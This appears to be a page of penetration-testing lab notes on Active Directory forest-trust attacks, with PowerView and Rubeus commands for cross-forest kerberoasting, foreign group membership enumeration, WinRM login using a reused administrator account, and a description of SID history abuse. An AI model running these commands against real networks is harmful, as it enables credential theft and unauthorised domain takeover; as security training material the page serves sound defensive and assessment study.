Forest->Forest Trust

Kerberoasting

Note: Kerberos attacks such as Kerberoasting and ASREPRoasting can be performed across trusts, depending on the trust direction. It is possible because authentication is still enabled cross-forest.

We can utilize PowerView to enumerate accounts in a target domain that have SPNs associated with them.

Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName

Let's enumerate a user we found here. For example user mssqlsvc:

Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc |select samaccountname,memberof

Now lets perform Kerberoasting attack using Rubeus:

.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap

Now we just crack the hash.

Admin Password Re-Use & Group Membership

Sometimes we'll run into situations where admin users in one domain are also admin users in another domain. So it is worth checking for password re-use between domains.

We may also see members of one domain are also members of another domain. Only Domain Local Groups allow security principals from outside its forest. We can use the PowerView function Get-DomainForeignGroupMember to enumerate groups with users that do not belong to the domain, also known as foreign group membership.

Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL

This will show the MemberName in SID and if we convert it we will get the domain it is a member of:

Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500

Here for example we see that the built-in Administrators group in FREIGHTLOGISTICS.LOCAL has the built-in Administrator account for the INLANEFREIGHT.LOCAL domain as a member.

PS C:\htb> Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL

GroupDomain             : FREIGHTLOGISTICS.LOCAL
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=FREIGHTLOGISTICS,DC=LOCAL
MemberDomain            : FREIGHTLOGISTICS.LOCAL
MemberName              : S-1-5-21-3842939050-3880317879-2865463114-500
MemberDistinguishedName : CN=S-1-5-21-3842939050-3880317879-2865463114-500,CN=ForeignSecurityPrincipals,DC=FREIGHTLOGIS
                          TICS,DC=LOCAL

PS C:\htb> Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500

INLANEFREIGHT\administrator

We can verify this access using the Enter-PSSession cmdlet to connect over WinRM.

Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator

With that we will successfully authenticate to the Domain Controller in the FREIGHTLOGISTICS.LOCAL domain using the Administrator account from the INLANEFREIGHT.LOCAL domain across the bidirectional forest trust. This can be a quick win after taking control of a domain and is always worth checking for if a bidirectional forest trust situation is present during an assessment and the second forest is in-scope.

SID History Abuse

If the SID of an account with administrative privileges in Forest A is added to the SID history attribute of an account in Forest B, assuming they can authenticate across the forest, then this account will have administrative privileges when accessing resources in the partner forest.

PreviousChild->Parent Trust NextUseful Event IDs

Last updated 1 year ago

Was this helpful?